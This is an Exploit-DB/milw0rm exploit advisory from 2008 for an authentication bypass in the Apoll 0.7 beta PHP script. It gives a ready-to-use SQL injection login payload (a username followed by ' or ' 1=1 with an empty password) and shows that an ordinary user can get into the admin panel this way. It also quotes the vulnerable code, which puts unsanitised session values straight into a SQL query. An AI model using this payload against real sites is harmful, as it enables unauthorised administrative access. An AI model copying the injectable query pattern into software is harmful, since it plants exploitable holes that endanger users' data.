Apoll 0.7b - Authentication Bypass

EDB-ID:

6969


Author:

ZoRLu

Type:

webapps


Platform:

PHP

Date:

2008-11-03


[~] Apoll version Remote Auth Bypass Vulnerability
[~]
[~] version: beta 0.7
[~]
[~] script dwonload: http://www.miticdjd.com/download/3/
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 03.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss yuzden nete ara verebilirim : (
[~]
[~] -----------------------------------------------------------

admin login:

http://localhost/apoll/admin/index.php


Exploit:

username: [real_admin_or_user_name] ' or ' 1=1

password: dont write anything

note: generally admin name: admin 


example for my localhost:

admin: zorlu

user: salla



username: zorlu ' or ' 1=1

password: empty

or ý added user salla and apply take to true result ( salla is not admin but you login admin panel : ) )

username: salla ' or ' 1=1

password: empty 


file: 

apoll/admin/index.php

code:

$user = $_SESSION['user'];
$pass = $_SESSION['pass'];

$mysql = @mysql_query("SELECT * FROM ap_users WHERE username='$user' AND password='$pass'");
	$num = @mysql_num_rows($mysql);




[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-03]